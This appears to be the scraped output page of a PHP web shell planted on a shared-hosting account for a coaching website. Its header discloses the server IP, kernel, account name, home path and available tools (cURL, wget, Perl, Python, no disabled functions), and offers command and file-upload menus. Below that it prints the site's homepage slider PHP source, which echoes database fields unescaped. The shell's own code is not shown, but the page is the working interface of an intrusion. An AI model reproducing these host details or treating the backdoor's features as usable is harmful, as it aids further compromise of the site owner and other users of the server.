Server IP : 103.53.40.154 / Your IP : 3.137.178.122 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/leetcoaching.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<div class="it-slider-area fix"> <div class="it-slider-wrap p-relative"> <div class="it-slider-active"> <?php $sqlslide = "SELECT * FROM `tbl_slider` WHERE slider_status='Active' ORDER BY slider_order"; $runslide = mysqli_query($db,$sqlslide) or die("Query Not run"); while($dataslide = mysqli_fetch_assoc($runslide)){ ?> <div class="it-slider-bg it-slider-overlay d-flex align-items-center it-slider-height p-relative" data-background="admin/images/<?php echo $dataslide['image']?>" > <div class="it-slider-shape-1 d-none d-xl-block"> <img src="assets/img/slider/slider-shape-2.png" alt="<?php echo $dataslide['title']?>" /> </div> <!--<div class="it-slider-shape-2 d-none d-xl-block">--> <!-- <img src="assets/img/slider/slider-shape-1.png" alt="<?php echo $dataslide['title']?>" />--> <!--</div>--> <div class="container"> <div class="row"> <!--<div class="col-xl-7 col-lg-8">--> <!-- <div class="it-hero-2-content z-index-5">--> <!-- <h1 class="it-hero-2-title">--> <!-- <?php echo $dataslide['title']?>--> <!-- </h1>--> <!-- <div class="it-hero-2-text">--> <!-- <p><?php echo $dataslide['line']?></p>--> <!-- </div>--> <!-- </div>--> <!-- <div class="it-hero-2-btn-box d-flex align-items-center">--> <!-- <a class="it-btn-white sky-bg mr-30" href="https://apps.apple.com/in/app/classplus/id1324522260" target="_blank">--> <!-- <span>--> <!-- Download App--> <!-- <svg width="17" height="14" viewBox="0 0 17 14" fill="none" xmlns="http://www.w3.org/2000/svg" >--> <!-- <path d="M11 1.24023L16 7.24023L11 13.2402" stroke="currentcolor" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round" />--> <!-- <path d="M1 7.24023H16" stroke="currentcolor" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round" />--> <!-- </svg>--> <!-- </span>--> <!-- </a>--> <!-- </div>--> <!--</div>--> </div> </div> </div> <?php } ?> </div> <div class="it-slider-nav-wrap z-index-5" style="display:none;"> <div class="it-slider-nav-active d-none d-lg-block"> <?php $sqlslide = "SELECT * FROM `tbl_slider` WHERE slider_status='Active' ORDER BY slider_order"; $runslide = mysqli_query($db,$sqlslide) or die("Query Not run"); while($dataslide = mysqli_fetch_assoc($runslide)){ ?> <div class="it-slider-nav-thumb"> <img src="admin/images/<?php echo $dataslide['image']?>" alt="<?php echo $dataslide['title']?>" /> </div> <?php } ?> </div> </div> </div> </div>